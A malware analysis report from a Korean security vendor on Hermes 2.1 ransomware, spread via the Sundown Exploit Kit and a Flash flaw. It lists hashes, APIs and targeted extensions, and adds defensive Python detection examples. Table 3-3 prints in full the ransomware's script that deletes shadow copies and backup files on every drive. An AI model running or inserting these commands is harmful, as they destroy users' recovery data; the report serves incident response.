Drive by Download and Hermes 2.1
2018-04-30 (web page dated 2018-05-08)
Malware Analysis Monthly Report (2018-04)
This report describes Hermes 2.1, a ransomware that infects a computer when the user merely visits a compromised web site.
It was written by SOOSAN INT's Security Laboratory and may be used freely for research purposes. SOOSAN INT accepts no
responsibility for its use for any other purpose; that responsibility rests with the user.
You can reach us through the CERT members' e-mail addresses
([email protected] / [email protected] / [email protected])
ⓒ 2018 SOOSAN INT. All Rights Reserved.
SOOSAN INT Security Laboratory (CERT)
Contents
1. Abstract
2. Hermes 2.1 including Sundown Exploit Kit
2.1 Hermes and Sundown Exploit
2.2 Threat Course and Infection Symptom
3. Analysis Contents (Hermes 2.1)
3.1 Analyzed Malicious File Info
3.2 Dynamic Analysis
4. Recommendations
1. Abstract
Last month we were asked to analyze a ransomware infection. After examining the infection path and
the symptoms, we concluded that it was Hermes 2.1. This version is more advanced than earlier Hermes
builds in one respect: it is delivered through the Sundown Exploit Kit. In other words, we found that
the Sundown Exploit Kit was used to distribute Hermes 2.1.
Sundown, as used with Hermes 2.1, is known to exploit the Adobe Flash Player vulnerability
CVE-2018-4878 1). Our CERT team rated this as very dangerous because a user is infected simply by
visiting a web page.
Many web sites still deliver content through Adobe Flash. An attacker who can place a malicious Flash
object on such a site exploits the vulnerability in the visitor's Flash Player and drops malware such
as Hermes onto the visitor's machine, so every visitor of the site is exposed. This technique is called
'Drive-by Download', and it is exactly what we observed with Hermes 2.1.
Furthermore, we found that Hermes 2.1 targets about 5,100 file types, a far wider range than
WannaCry 2). We also found that Hermes 2.1 deletes the shadow copies that would otherwise allow the
encrypted files to be restored.
In short, we judged the threat serious enough to analyze it in full. This report is organized as
follows. Section 2 explains the history of Hermes and the features of the Sundown Exploit Kit, and
then how a device is infected and attacked. Section 3 describes the behavior of Hermes 2.1 observed
during analysis. Section 4 gives recommendations for staying safe from Hermes 2.1.
1) CVE (Common Vulnerabilities and Exposures): a list of publicly known security vulnerabilities; each
identifier carries the year of publication and a sequence number.
2) WannaCry: the ransomware outbreak of May 2017, which infected about 300,000 devices in 150 countries.
2. Hermes 2.1 including Sundown Exploit Kit
Hermes 2.1 is an advanced ransomware attack: it combines the earlier version of Hermes with the
Sundown Exploit Kit. In this section the original Hermes and the Sundown Exploit Kit are briefly
explained, and then the attack characteristics and risk level of Hermes 2.1 are examined.
2.1 Hermes and Sundown Exploit
Hermes became known through the cyber attack on FEIB (Far Eastern International Bank) in October
2017, which was attributed to Lazarus, the North Korean hacking group. The loss was reported to be
about US$60 million 3). The money was transferred to accounts at banks in several countries,
including Cambodia, the U.S.A. and Sri Lanka. Hermes did not appear to have been used for extortion;
instead, security analysts concluded that the ransomware had been deployed to hinder investigators
from reconstructing the details of the incident.
An exploit kit (also called an exploit pack) is a toolkit that automates the exploitation of client-
side vulnerabilities. In most cases an exploit kit targets software that web pages invoke in the
visitor's browser, such as Adobe Flash, Java or the browser itself, in order to carry out a Drive-by
Download attack. Sundown is one such kit; it exploits Adobe Flash vulnerabilities so that the attacker
can deliver malware to the visitors of a site.
In short, the attacker used the Sundown Exploit Kit to plant Hermes 2.1 on a web site, which then
infected its visitors. This distribution method had been seen before: in December 2017 the 'Matrix'
ransomware drew attention because, like Hermes 2.1, it infected users through web sites. Some security
analysts have speculated that the same actor is behind Matrix and Hermes 2.1.
3) Bank Info Security (Oct. 9, 2017), "Report: Malware-Wielding Hackers Hit Taiwanese Bank",
https://www.bankinfosecurity.com/report-malware-wielding-hackers-hit-taiwanese-bank-a-10368.
2.2 Threat Course and Infection Symptom
Figure 2-1 shows the overall attack path of Hermes 2.1 and the symptoms of infection:
[Figure 2-1] Hermes 2.1 Attack Process
According to our analysis, the attacker delivered Hermes 2.1 by Drive-by Download through the Sundown
Exploit Kit. Sundown exploited the Flash vulnerability published as CVE-2018-4878 4), which affects
Adobe Flash Player 28.0.0.137 and earlier. A visitor whose browser runs one of these versions is
exploited simply by loading the page, and is then infected with Hermes 2.1.
Once running, Hermes 2.1 first deletes the Volume Shadow Copies 5) with vssadmin 6), which prevents
the encrypted files from being restored from snapshots. It then encrypts the targeted files with
AES/RSA. Finally, it writes a ransom note telling the user that the machine is infected by Hermes 2.1
and demanding payment in cryptocurrency (DASH).
4) CVE-2018-4878: a remote code execution vulnerability in Adobe Flash Player.
5) Shadow Copy (Volume Shadow Copy): a point-in-time snapshot of a volume kept by the Windows Volume
Shadow Copy Service. Windows Backup and System Restore use it, so it is often the quickest way to
recover files after a ransomware attack.
6) vssadmin: the Windows command-line tool that administers shadow copies. "vssadmin Delete Shadows
/all /quiet" removes every snapshot, and "vssadmin resize shadowstorage" with a small /maxsize forces
Windows to discard existing snapshots; both appear in Table 3-3.
From the description of Hermes and the Sundown Exploit Kit above, we concluded the following:
1. The Sundown Exploit Kit spreads widely because the Drive-by Download technique needs no action
from the victim beyond visiting a page.
2. Hermes 2.1 is a ransomware that attacks files, so it is especially dangerous to institutions that
store important files.
3. In terms of attack range and ease of spread, we rate the threat of Hermes 2.1 at the same level as
WannaCry.
3. Analysis Contents (Hermes 2.1)
Our CERT analyzed Hermes 2.1. The findings are described in the following subsections:
3.1 Analyzed Malicious File Info
The analyzed file is "[temporarily saved file].exe". Its hashes are:
- MD5: a45c1a696cc5e634c12c2a296966ecb7
- SHA-1: 92d2c2c5ae6d5af7e7723ff1c21c136d4f664daf
- SHA-256: 3f8eef075d1d96c4730bedf5039de9508b3805fbe7cffdcd08b61ea9ec101ed (as printed in the report;
this string is 63 hex digits, one short of a full SHA-256, so match on the MD5 or SHA-1 when searching
for the sample)
Table 3-1 lists the Windows APIs imported by Hermes 2.1. Table 3-2 shows the file extensions it targets
for encryption. Table 3-3 gives the command lines it runs to defeat file recovery.
[Table 3-1] Hermes 2.1's imported APIs (grouped by DLL)
kernel32.dll: LoadLibraryA, FreeLibrary, GetModuleHandleA, GetModuleFileNameA, GetModuleFileNameW,
GetCommandLineW, GetStartupInfoW, GetVersionExW, GetSystemDefaultLangID, GetTickCount, Sleep,
ExitProcess, GetCurrentProcess, CreateProcessA, CreateProcessW, WinExec, VirtualAlloc, VirtualFree,
GlobalAlloc, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, GetWindowsDirectoryW,
GetLogicalDrives, GetDriveTypeW, CreateDirectoryW, FindFirstFileW, FindNextFileW, FindClose,
CreateFileA, CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileSize, CloseHandle, CopyFileA,
CopyFileW, DeleteFileW, GetFileAttributesA, GetFileAttributesW, SetFileAttributesA, SetFileAttributesW
mpr.dll: WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
advapi32.dll: CryptAcquireContextW, CryptGenKey, CryptDeriveKey, CryptImportKey, CryptExportKey,
CryptEncrypt, CryptDecrypt, CryptDestroyKey, GetUserNameA, GetUserNameW, RegOpenKeyExA, RegOpenKeyExW,
RegQueryValueExA, RegSetValueExW, RegDeleteValueW, RegCloseKey
ole32.dll: CoInitialize, CoCreateInstance
Shell32.dll: ShellExecuteA, ShellExecuteW
Read together, the imports are consistent with the behavior in Section 3.2: GetLogicalDrives and
GetDriveTypeW with FindFirstFileW/FindNextFileW walk the local drives, the mpr.dll WNet* functions
enumerate network resources, the advapi32.dll Crypt* functions are the Windows CryptoAPI calls that
carry out the AES/RSA encryption, CreateFileA/ReadFile/WriteFile perform the per-file encryption, and
CreateProcess/WinExec/ShellExecute are how the shadow-copy deletion commands in Table 3-3 can be launched.
[Table 3-2] File types targeted by Hermes 2.1 (excerpt of the dot-joined extension string at 00406218; the
full list runs to about 5,100 entries and is truncated here as in the original)
.tif.php.1cd.7z.cd.1cd.dbf.ai.arw.txt.doc.docm.docx.zip.rar.xlsx.xls.xlsb.xlsm.jpg.jpe.jpeg.bmp.db.eql.sql.adp.mdf.frm.mdb.odb.odm.odp.ods.dbc.frx.db2.dbs.pds.pdt.pdf.dt.cf.cfu.mxl.epf.kdbx.erf.vrp.grs.
geo.st.pff.mft.efd.3dm.3ds.rib.ma.max.lwo.lws.m3d.mb.obj.x.x3d.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.
adn.a3d.aft.ahd.alf.ask.awdb.azz.bdb.bib.bnd.bok.btr.bak.cdb.ckp.clkw.cma.crd.dad.daf.db3.dbk.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.fcd.fic.fid.fil.fm5.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdn.mdt.mrg.mud.
mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.oqy.ora.orx.$$$.$01.$db.$efs.$er.__a.__b.{pb.~cw.~hm.0.00.000.001.002.1.101.103.108.110.113.123.123c.123d.123dx.128.1cd.1pe.1ph.1sp.1st.256.264.2d.2mg.3.32x.3d.3d2.3d4.3da.3dc.3dd.3df.3df8.3dl.3dm.3dmf.3dmk.3don.3dp.3dr.3ds.3dt.3dv.3dw.3dx.3dxml.3fr.3g2.3ga.3gp.3gp2.3gpp.3gpp2.3me.3mm.3p2.3pe.3pr.3w.4db.4dd.4dl.4dv.4mp.4th.4w7.555.602.60d.73b.73c.73l.787.7z.7zip.8.890.89t.89y.8ba.8bc.8be.8bf.8bi.8bi8.8bl.8bs.8bx.8by.8ld.8li.
8pbs.8st.8svx.8xg.8xk.8xs.8xt.8xv.9xt.9xy.a.av.a00.a01.a02.a1wish.a26.a2c.a2l.a2m.a2theme.a2w.a3l.a3m.a3w.a4l.a4m.a4p.a4w.a52.a5l.a5rpt.a5w.a5wcmp.a65.a8s.aa.aa3.aac.aaf.aah.aam.aao.aaui.ab.ab1.ab2.ab3.ab4.ab65.aba.abc.abcd.abdata.abf.abi.abk.abkprj.abp.abs.abt.abw.abx.aby.ac2.ac3.ac5.ac6.aca.acbl.acc.accda.accdb.accdc.accde.accdr.accdt.accdu.accdw.accft.acd.ace.acf.acg.ach.aco.acp.acr.acrobatsecuritysettings.acrodata.acroplugin.acrypt.act.actm.actx.acv.acw.acx.ad.ada.adb.adblock.
adc.adcp.add.addin.addon.ade.adf.adi.adn.ado.adobebridge.adoc.ados.adox.adp.adpb.adpp.adr.ads.adt.adu.adv.advs.adx.adz.aea.aec.aep.aepx.aes.aet.aetx.aex.afd.afdesign.afe.aff.afm.afp.afs.aft.agb.agd.agd1.agdl.age3rec.age3sav.age3scn.age3xrec.age3xsav.age3xscn.age3yrec.age3ysav.age3yscn.
agg.aggr.agi.agx.ahd.ahf.ahl.ahs.ahu.ai.aia.aif.aifb.aiff.aim.ain.aip.ais.ait.aiu.aiv.ajp.ak.al.al8.ala.alb.alb3.alb4.alb5.alb6.alc.ald.ale.alf.ali.allet.alm.alp.alr.alt3.alt5.alv.alx.alz.am.am1.am4.am5.am6.am7.amb.amc.amf.aml.amm.amp.amr.ams.amsorm.amt.amu.amv.amx.amxx.an.an1.an2.an8.ane.anim.animset.animset_ingame.anl.anm.anme.ann.ans.ansr.ansym.anx.any.aof.aoi.aois.aom.ap.ap_.apa.apd.ape.apf.aph.api.apj.apk.apl.aplg.aplp.apnx.apo.app.applet.application.appref-ms.approj.appx.appxsym.appxupload.apr.aps.apt.apw.apxl.apz.aqt.ar.arc.arch00.arcut.ard.arena.arf.arff.arg.arh.ari.arj.ark.arl.aro.arp.arpack.arr.ars.arsc.artproj.arw.arx.as.as$.as2proj.as3.as3proj.as4.asa.asat.asax.asc.ascii.ascm.ascs.ascx.asd.asdb.ase.asef.asf.ash.ashbak.ashdisc.ashprj.ashx.asi.ask.asl.asm.
asmx.asn.asnd.asp.aspx.asr.asset.asstrm.ast.asv.asvf.asvx.aswcs.asws.asx.asy.atc.ate.atf.ath.ati.atl.atm.atn.atom.atomsvc.atr.ats.att.atw.atx.aty.atz.au3.aut.automaticdestinations.autoplay.aux.av.ava.avb.avc.avchd.avd.ave.avhd.avi.avj.avn.avp.avs.avv.avx.aw.awcav.awd.awdb.awe.awg.awlive.awm.awp.aws.awt.aww.awwp.ax.axd.axe.axm.axp.axt.axx.azf.azs.azw.azw1.azw3.azw4.azz.azzx.b.b1.b27.b2a.b3d.b5i.b5t.b64.b6i.b6t.ba.bac.back.backup.backupdb.bad.bafl.bak.bak~.bak2.bak3.bakx.bamboopaper.
bank.bar.bas.base.baserproj.basex.bat.bau.bav.bax.bay.bb.bb3.bbb.bbc.bbcd.bbl.bbprojectd.bbs.bbxt.bbz.bc5.bc6.bc7.bcc.bcd.bci.bck.bckp.bcl.bcm.bcmx.bcp.bcs.bct.bdb.bdb2.bdc.bdf.bdic.bdl.bdm.bdmv.bdp.bdr.bdsproj.bdt2.bdt3.bean.bed.bet.bf.bfa.bfg.bfm.bfs.bfx.bgi.bgl.bgt.bgv.bgz.bh.bho.bhx.bi8.bib.bibtex.bic.bif.big.bik.bil.bim.bin.bina.bionix.bip.biq.bit.bitpim.bix.bizdocument.bjl.bjo.bk.bk!.bk1.bk2.bk3.bk4.bk5.bk6.bk7.bk8.bk9.bkc.bkf.bkg.bkk.bkp.bks.bkup.bkz.blb ...
[Table 3-3] Command lines that delete shadow copies and backup files (vssadmin)
The strings are stored in the binary at 0x004054D0 to 0x00405A82 and form one batch script. The string
dump interleaved the fragments, so the script is reconstructed here from the overlapping pieces (every
drive letter c: to h:, the values 401MB and unbounded, "Delete Shadows /all /quiet" and the self-deleting
"del %0" all appear in them):
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
Shrinking the shadow storage of each volume to 401MB makes Windows discard the existing snapshots, and
resizing it back to unbounded leaves the volume looking normal afterwards. The del lines then remove
common backup formats (Hyper-V .VHD images, Windows Backup .bkf/.wbcat/.set catalogs, generic .bak/.bac
files and Backup folders) from every drive, and del %0 deletes the script itself.
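The commands above are the Hermes 2.1 indicators most useful for detection and incident response, so the following is an added example (written for this edit, not SOOSAN INT's code) that classifies command lines against them and flags the parent process whose children ran them. Both inputs are constructed: BATCH is rebuilt from the Table 3-3 strings and cut to two drives, and PROCESS_LOG is a simplified "time|parent image|image|command line" record rather than a real Sysmon or Event ID 4688 export; the script name window.bat and the sample's path are placeholders the page does not give. Note that del is a cmd.exe built-in, so it never appears as a process creation of its own: it is visible only in a recovered script or inside a "cmd /c" command line, which is why the example scans both kinds of input.

```python
"""Classify command lines against the Hermes 2.1 recovery-destruction commands
in Table 3-3 and flag the parent process whose children ran them.
Added example by the editor, not SOOSAN INT code.  Inputs are constructed:
BATCH is rebuilt from the Table 3-3 strings (cut to two drives) and
PROCESS_LOG is a simplified "time|parent image|image|command line" record,
not a real Sysmon or Event ID 4688 export.  The script name window.bat and
the sample path are placeholders; the page names neither."""
import re
from collections import defaultdict

# One rule per behaviour seen in Table 3-3.  The del rule accepts /s /f /q in
# any order because other families reorder the switches; the resize rule is
# tuned to the 401MB / unbounded values the page shows.
RULES = [
    ("vss_delete_shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*\s/all\b.*\s/quiet\b", re.I)),
    ("vss_resize_shadowstorage",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\s+/for=[a-z]:\s+/on=[a-z]:"
                r"\s+/maxsize=(?:\d+mb|unbounded)\b", re.I)),
    ("backup_wildcard_delete",
     re.compile(r"\bdel\b(?:\s+/[sfq]){3}\s+.*[a-z]:\\(?:\*\.(?:vhd|bac|bak|wbcat|bkf|set|win|dsk)"
                r"|backup\*\.\*)", re.I)),
    ("batch_self_delete", re.compile(r"\bdel\s+%0\b", re.I)),
]

# Administrators legitimately resize shadow storage, so only these two rules
# count as high confidence on their own.
HIGH_CONFIDENCE = {"vss_delete_shadows", "backup_wildcard_delete"}


def classify_command(cmdline):
    """Return the set of rule names that the command line matches."""
    return {name for name, rx in RULES if rx.search(cmdline)}


def scan_script(text):
    """Count rule hits per line of a recovered batch script (Table 3-3 content)."""
    counts = defaultdict(int)
    for line in text.splitlines():
        for name in classify_command(line):
            counts[name] += 1
    return dict(counts)


def flag_parents(log):
    """Group process-creation records by parent image and return the parents
    whose children show high-confidence destruction behaviour, with the rules seen."""
    seen = defaultdict(set)
    for record in log.splitlines():
        if not record.strip():
            continue
        _time, parent, _image, cmdline = record.split("|", 3)
        seen[parent] |= classify_command(cmdline)
    return {parent: rules for parent, rules in seen.items() if rules & HIGH_CONFIDENCE}


# Constructed: the Table 3-3 script, shortened to drives c: and d:.
BATCH = r"""vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del %0
"""

# Constructed process-creation records: the ransomware's cmd.exe children, an
# administrator listing shadows, and a scheduled resize to a percentage.
PROCESS_LOG = r"""2018-04-12T10:01:03|C:\Users\victim\AppData\Local\Temp\HerMes.exe|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\victim\AppData\Local\Temp\window.bat
2018-04-12T10:01:03|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin Delete Shadows /all /quiet
2018-04-12T10:01:04|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2018-04-12T10:01:04|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2018-04-12T14:22:10|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c vssadmin list shadows
2018-04-12T15:00:00|C:\Windows\System32\svchost.exe|C:\Windows\System32\vssadmin.exe|vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10%
"""

if __name__ == "__main__":
    print("script hits:", scan_script(BATCH))
    for parent, rules in flag_parents(PROCESS_LOG).items():
        print("flag parent:", parent, sorted(rules))
```

Only cmd.exe is flagged: the administrator's "vssadmin list shadows" and the percentage-based resize match nothing, while the delete-shadows line alone is enough. In a real pipeline the parent grouping should also be bounded by time and by the parent's own parent (here an executable in a user's Temp directory), which is the detail that separates this script from routine maintenance.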
3.2 Dynamic Analysis
1. In Figure 3-1 the instruction MOV ESI, HerMes.00406218 loads the address 00406218 into ESI. ESI (the
source index register) is what x86 string and copy instructions use as their source pointer, so the code
is about to read from that address. Figure 3-2 shows what is stored there: the dot-joined list of file
extensions that Hermes 2.1 encrypts (Table 3-2).
[Figure 3-1] Targeted file types
[Figure 3-2] Contents at address 00406218
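Because the list at 00406218 is one dot-joined string, an analyst scoping an incident usually wants it parsed into a set and compared against a file listing. The following is an added example (not code from the report) that does this with a constructed excerpt of Table 3-2 and a constructed listing; the page does not describe how Hermes 2.1 itself compares file names, so the case-insensitive last-suffix rule used here is an assumption, and the separate .HRM group relies on the extension change shown in Figure 3-6.

```python
"""Parse the dot-joined extension list stored at 00406218 (Table 3-2) and use
it to scope a file listing.  Added example by the editor, not SOOSAN INT code.
RAW_EXT_LIST is a constructed excerpt of the Table 3-2 string in the binary's
own ".ext.ext" form and SAMPLE_LISTING is constructed too.  Matching on the
lower-cased last suffix is an assumption: the page does not say how Hermes 2.1
compares file names."""
import ntpath  # handles Windows paths regardless of the host OS

RAW_EXT_LIST = (".tif.php.1cd.7z.cd.1cd.dbf.ai.arw.txt.doc.docm.docx.zip.rar"
                ".xlsx.xls.jpg.$$$.bak~.bk!.appref-ms")

ENCRYPTED_EXT = "hrm"  # extension Hermes 2.1 appends to encrypted files (Figure 3-6)


def parse_extension_list(raw):
    """Split the dot-joined list into a frozenset of lower-case extensions.
    The string begins with a dot, so the first field is empty and is dropped;
    entries such as '$$$', 'bak~' or 'bk!' never contain a dot themselves,
    which is what makes a plain split safe.  Duplicates (1cd appears twice in
    the page's list) collapse into one entry."""
    return frozenset(ext.lower() for ext in raw.split(".") if ext)


def last_suffix(path):
    """Lower-cased text after the final dot of the file name, or None when the
    name has no dot.  'archive.tar.7z' yields '7z', as Windows would see it."""
    name = ntpath.basename(path)
    if "." not in name:
        return None
    return name.rsplit(".", 1)[1].lower()


def targeted_extension(path, targets):
    """Return the matching target extension for path, else None."""
    ext = last_suffix(path)
    return ext if ext in targets else None


def partition_listing(paths, targets):
    """Split a listing into (would be encrypted, already encrypted, out of scope).
    Files already carrying .HRM are reported separately so an incident responder
    can count damage and remaining exposure in one pass."""
    targeted, encrypted, other = [], [], []
    for path in paths:
        ext = last_suffix(path)
        if ext == ENCRYPTED_EXT:
            encrypted.append(path)
        elif ext in targets:
            targeted.append(path)
        else:
            other.append(path)
    return targeted, encrypted, other


# Constructed listing for the usage below.
SAMPLE_LISTING = [
    r"C:\Users\victim\Documents\report.DOCX",
    r"C:\Users\victim\Documents\report.docx.HRM",
    r"C:\Backup\db.bak~",
    r"C:\Windows\notepad.exe",
    r"C:\Users\victim\README",
]

if __name__ == "__main__":
    targets = parse_extension_list(RAW_EXT_LIST)
    for label, group in zip(("targeted", "encrypted", "other"),
                            partition_listing(SAMPLE_LISTING, targets)):
        print(label, group)
```

Feed parse_extension_list the full string dumped from the sample rather than the excerpt when scoping a real incident; the split is unchanged, only the set grows.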
2. Figure 3-3 shows the evidence that files are encrypted with the RSA and AES algorithms, consistent
with the Windows CryptoAPI functions listed under advapi32.dll in Table 3-1.
[Figure 3-3] RSA/AES
3. Hermes 2.1 opens each targeted file with CreateFileA. CreateFileA creates or opens a file or I/O
device and returns the handle used for the subsequent reads and writes.
[Figure 3-4] Process of file encryption
4. After opening a file with CreateFileA, Hermes 2.1 reads its contents, encrypts them, and writes the
ciphertext back to disk with WriteFile.
[Figure 3-5] Encryption Command line
5. Figure 3-6 shows the encrypted file being renamed with the .HRM extension.
[Figure 3-6] Process of file extension change (encryption in progress)
4. Recommendations
[Figure 4-1] Three Steps for Ransomware Attack Mitigation
1. (First Step) Prevention: regular updates of anti-virus software and systems
At a minimum, keep anti-virus signatures and the operating system, browser and plug-ins up to date.
Attacks that rely on exploits, as Hermes 2.1 does, are increasing, and an exploit kit succeeds only
against unpatched software: Adobe released the fix for CVE-2018-4878 in February 2018 (Flash Player
28.0.0.161), so a visitor running a patched Flash Player is not infected by this kit.
2. (Second Step) Detection: detection of malicious sites with eWalker/ePrism
The best defense is not to visit an infected site, but a user has no way to tell on their own that a
site has been compromised. We therefore recommend eWalker/ePrism. eWalker maintains a database of
more than 400,000 malicious sites and adds around 30,000 entries per update, so it can block the
Drive-by Download before the exploit reaches the browser. ePrism additionally inspects encrypted
network traffic, which attackers use to hide malware, including ransomware.
3. (Third Step) Reaction: protecting important assets with eRed
eRed is a security solution that blocks any process not on its white-list from executing, so
malicious behavior such as Hermes 2.1's cannot run. We verified this by running Hermes 2.1 against a
server protected by eRed and confirming that eRed stopped it. Because eRed operates at the hypervisor
layer beneath the guest OS, it is out of reach of malware inside the guest, which is what makes its
protection robust.
2018 SOOSAN INT Security Analysis Reports
Malware Analysis Monthly Report
2018-01: Cryptocurrency Mining Malware Analysis (January 2018)
2018-02: UBoat RAT Analysis Report (February 2018)
2018-03: Olympic Destroyer Analysis Report (March 2018)
2018-04: Drive by Download and Hermes 2.1 (April 2018)
End of Document
#3F, Suseo Hyundai Venture-ville, 10, Bamgogae-ro 1-gil, Gangnam-gu, Seoul, Korea 06349
Tel +82-2-541-0073 | Fax +82-2-541-0204
E-mail [email protected]
Web http://www.soosanint.com